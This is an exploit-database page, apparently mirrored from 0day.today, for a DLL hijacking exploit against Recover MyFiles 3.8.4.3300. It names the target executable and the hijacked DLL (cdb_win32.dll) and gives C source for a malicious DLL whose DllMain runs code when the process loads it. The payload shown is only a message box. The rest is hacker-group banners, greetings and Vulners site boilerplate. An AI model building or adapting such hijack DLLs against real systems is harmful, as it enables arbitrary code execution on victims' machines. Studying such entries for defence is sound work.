Lucene search
K

Recover MyFiles 3.8.4.3300 DLL Hijacking Exploit

🗓️ 27 Aug 2011 00:00:00Reported by indoushkaType 
zdt
 zdt
🔗 0day.today👁 27 Views

Recover MyFiles 3.8.4.3300 DLL Hijacking Exploit by indoushk

Code
===============================================
Recover MyFiles 3.8.4.3300 DLL Hijacking Exploit 
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0     _   ____   ____   _____   __   _____  __    __  1
1   _| | |__  | |__  | |___  | |  | |  _  | \ \  / /  0
0  |_  |  __| |   _| |    / /  |  | | |_| |  \ \/ /   1
1    | | |__  |  |__ |   / / __|  | |  _  |   /  /    0
0    | |  __| |  __| |  / / /  _  | | | | |  /  /     1
1    |_| |____| |____| /_/ /  [_] | | | | | /  /      0
0        Site:1337day.com /_______| |_| |_|/__/       1
1     Support e-mail  : submit[at]inj3ct0r.com        0                                      
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

           # Vendor: http://www.softpedia.com/

                 # Date: 2011-07-27 

                # Author : indoushka 

            +++=[ Dz Offenders Cr3w ]=+++

         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 

           # Contact : [email protected]

     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
RecoverMyFiles.exe

cdb_win32.dll

-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation